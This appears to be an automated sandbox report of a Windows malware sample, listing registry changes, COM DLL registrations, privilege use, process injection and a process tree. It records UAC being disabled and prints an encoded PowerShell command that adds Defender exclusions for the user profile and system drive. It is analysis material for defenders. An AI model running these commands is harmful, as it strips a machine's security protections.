description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VCREDI~2.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Knbbep32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kgamnded.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gold.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mblcnj32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fello_s_Revenge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1955e7fe3c25216101d012eb0b33f527.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mahnhhod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Nbcjnilj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Nknobkje.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ikcmbfcj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ihgnkkbd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Iakiia32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Jnhpoamf.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral13/files/0x001900000002ad61-134.dat nsis_installer_1 behavioral13/files/0x001900000002ad61-134.dat nsis_installer_2 -
Modifies registry class 37 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Mahnhhod.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Mblcnj32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Nbcjnilj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Nbcjnilj.exe Key created \REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000_Classes\Local Settings Fello_s_Revenge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Nknobkje.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Ihgnkkbd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Ihgnkkbd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Knbbep32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738} 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Iakiia32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Heolpdjf.dll" Ikcmbfcj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Hijjli32.dll" Knbbep32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Nknobkje.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Iakiia32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ophpeg32.dll" Jnhpoamf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Kgamnded.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Mahnhhod.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Mblcnj32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Dgcaaddl.dll" Nbcjnilj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Kalhafbk.dll" Nknobkje.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Jnhpoamf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Knbbep32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Kgamnded.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ddnnfbmk.dll" 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Jnhpoamf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ddhmmpnk.dll" Mahnhhod.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Peehmbji.dll" Mblcnj32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Lndigcej.dll" Iakiia32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ejjlbppk.dll" Ihgnkkbd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Cobhcgin.dll" Kgamnded.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 Ikcmbfcj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" Ikcmbfcj.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5832 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 3608 powershell.exe 3608 powershell.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 2968 powershell.exe 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 3688 c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe 3688 c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3608 powershell.exe Token: SeDebugPrivilege 4300 1955e7fe3c25216101d012eb0b33f527.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Token: SeDebugPrivilege 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2184 wrote to memory of 3608 2184 Fello_s_Revenge.exe 82 PID 2184 wrote to memory of 3608 2184 Fello_s_Revenge.exe 82 PID 2184 wrote to memory of 3608 2184 Fello_s_Revenge.exe 82 PID 2184 wrote to memory of 2968 2184 Fello_s_Revenge.exe 84 PID 2184 wrote to memory of 2968 2184 Fello_s_Revenge.exe 84 PID 2184 wrote to memory of 2968 2184 Fello_s_Revenge.exe 84 PID 2184 wrote to memory of 620 2184 Fello_s_Revenge.exe 86 PID 2184 wrote to memory of 620 2184 Fello_s_Revenge.exe 86 PID 2184 wrote to memory of 620 2184 Fello_s_Revenge.exe 86 PID 2184 wrote to memory of 668 2184 Fello_s_Revenge.exe 87 PID 2184 wrote to memory of 668 2184 Fello_s_Revenge.exe 87 PID 2184 wrote to memory of 668 2184 Fello_s_Revenge.exe 87 PID 2184 wrote to memory of 784 2184 Fello_s_Revenge.exe 88 PID 2184 wrote to memory of 784 2184 Fello_s_Revenge.exe 88 PID 2184 wrote to memory of 784 2184 Fello_s_Revenge.exe 88 PID 2184 wrote to memory of 2072 2184 Fello_s_Revenge.exe 89 PID 2184 wrote to memory of 2072 2184 Fello_s_Revenge.exe 89 PID 2184 wrote to memory of 2072 2184 Fello_s_Revenge.exe 89 PID 784 wrote to memory of 4056 784 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 90 PID 784 wrote to memory of 4056 784 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 90 PID 784 wrote to memory of 4056 784 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 90 PID 2184 wrote to memory of 4300 2184 Fello_s_Revenge.exe 91 PID 2184 wrote to memory of 4300 2184 Fello_s_Revenge.exe 91 PID 2184 wrote to memory of 4300 2184 Fello_s_Revenge.exe 91 PID 4056 wrote to memory of 3396 4056 Iakiia32.exe 92 PID 4056 wrote to memory of 3396 4056 Iakiia32.exe 92 PID 4056 wrote to memory of 3396 4056 Iakiia32.exe 92 PID 668 wrote to memory of 440 668 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 93 PID 668 wrote to memory of 440 668 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 93 PID 3396 wrote to memory of 3884 3396 Ikcmbfcj.exe 94 PID 3396 wrote to memory of 3884 3396 Ikcmbfcj.exe 94 PID 3396 wrote to memory of 3884 3396 Ikcmbfcj.exe 94 PID 2184 wrote to memory of 1200 2184 Fello_s_Revenge.exe 95 PID 2184 wrote to memory of 1200 2184 Fello_s_Revenge.exe 95 PID 2184 wrote to memory of 1200 2184 Fello_s_Revenge.exe 95 PID 2184 wrote to memory of 1164 2184 Fello_s_Revenge.exe 96 PID 2184 wrote to memory of 1164 2184 Fello_s_Revenge.exe 96 PID 2184 wrote to memory of 1164 2184 Fello_s_Revenge.exe 96 PID 3884 wrote to memory of 4240 3884 Ihgnkkbd.exe 97 PID 3884 wrote to memory of 4240 3884 Ihgnkkbd.exe 97 PID 3884 wrote to memory of 4240 3884 Ihgnkkbd.exe 97 PID 2184 wrote to memory of 3172 2184 Fello_s_Revenge.exe 98 PID 2184 wrote to memory of 3172 2184 Fello_s_Revenge.exe 98 PID 2184 wrote to memory of 3172 2184 Fello_s_Revenge.exe 98 PID 4240 wrote to memory of 1452 4240 Jnhpoamf.exe 99 PID 4240 wrote to memory of 1452 4240 Jnhpoamf.exe 99 PID 4240 wrote to memory of 1452 4240 Jnhpoamf.exe 99 PID 1200 wrote to memory of 820 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 9 PID 1200 wrote to memory of 828 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 10 PID 1200 wrote to memory of 572 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 13 PID 1200 wrote to memory of 2992 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 49 PID 1200 wrote to memory of 3028 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 50 PID 1200 wrote to memory of 3296 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 52 PID 1200 wrote to memory of 3428 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 53 PID 1200 wrote to memory of 3744 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 55 PID 1200 wrote to memory of 3768 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 56 PID 1200 wrote to memory of 3860 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 57 PID 1200 wrote to memory of 3920 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 58 PID 1200 wrote to memory of 3980 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 59 PID 1200 wrote to memory of 4008 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 60 PID 1200 wrote to memory of 4292 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 61 PID 1200 wrote to memory of 1072 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 77 PID 1200 wrote to memory of 1708 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 78 PID 1200 wrote to memory of 1240 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 80 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Processes
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:820
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:828
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:572
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3028
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3296
-
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Fello_s_Revenge.exe"C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Fello_s_Revenge.exe"2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAaQB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAagBsACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBPAFUAJwAnAFIARQAgAEMATwBPAEsARQBEACAATwBOAEMARQAgAEEARwBBAEkATgAgAEIAWQAgAEYANdhs3DXYKd012CndbwAgAEwATQBBAE8AIQAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAHUAZgAjAD4A"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3608 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:420
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAcwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwBxACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3484
-
-
-
C:\Users\Admin\AppData\Local\Temp\0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe"C:\Users\Admin\AppData\Local\Temp\0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:620
-
-
